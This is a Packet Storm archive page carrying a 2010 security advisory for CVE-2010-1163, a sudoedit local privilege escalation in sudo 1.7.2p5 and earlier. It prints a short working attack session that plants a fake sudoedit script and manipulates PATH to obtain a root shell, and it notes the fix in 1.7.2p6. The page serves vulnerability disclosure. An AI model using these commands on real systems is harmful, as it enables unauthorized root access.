what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Sudo 1.7.2p5 Local Privilege Escalation

Sudo 1.7.2p5 Local Privilege Escalation
Posted Apr 20, 2010
Authored by Maurizio Agazzini, Valerio Costamagna | Site lab.mediaservice.net

sudoedit as found in sudo versions 1.7.2p5 and below fails to verify the path of the executable and therefore allows for an easy to exploit local privilege escalation vulnerability.

tags | exploit, local
advisories | CVE-2010-1163
SHA-256 | a12883304c4dce1e37de911cb644e89a0c117cf64d9679955b98211211bdd18a

Sudo 1.7.2p5 Local Privilege Escalation

Change Mirror Download
Security Advisory           @ Mediaservice.net Srl
(#02, 19/04/2010) Data Security Division

Title: sudoedit local privilege escalation through PATH manipulation
Application: sudo <= 1.7.2p5
Platform: Linux, maybe others
Description: A local user with permission to run the sudoedit pseudo-command
can gain root privileges, through manipulation of the PATH
environment variable.
Authors: Valerio Costamagna <sid@mediaservice.net>
Maurizio Agazzini <inode@mediaservice.net>
Vendor Status: sudo team notified on 26/03/2010
CVE Candidate: The Common Vulnerabilities and Exposures project has assigned
the name CVE-2010-1163 to this issue.
References: http://lab.mediaservice.net/advisory/2010-02-sudo.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1163
http://www.sudo.ws/sudo/alerts/sudoedit_escalate2.html

1. Abstract.

While writing an article about the vulnerability outlined in CVE-2010-0426, we
found a distinct security flaw, also related to the sudoedit pseudo-command.
Specifically, the path component of sudoedit is not checked correctly. This
can be easily exploited by a local user with permission to run sudoedit, in
order to execute arbitrary commands as root.

2. Example Attack Session.

inode@pandora:~$ echo "/bin/sh" > sudoedit
inode@pandora:~$ /usr/bin/chmod +x sudoedit
inode@pandora:~$ id
uid=1000(inode) gid=100(users) groups=100(users)
inode@pandora:~$ export PATH=.
inode@pandora:~$ /usr/bin/sudo sudoedit /etc/hosts
Password:
sh-3.1# /usr/bin/id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),
10(wheel),11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev),84(power),
86(netdev),93(scanner)
sh-3.1#

3. Affected Platforms.

All vendors supporting sudo <= 1.7.2p5 are affected. Exploitation of this
vulnerability requires that the /etc/sudoers file be configured to allow the
attacker to run sudoedit.

4. Fix.

On April 9th 2010, version 1.7.2p6 has been relased by the sudo team, which
fixes the described vulnerability.

5. Proof Of Concept.

See Example Attack Session above.

Copyright (c) 2010 @ Mediaservice.net Srl. All rights reserved.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close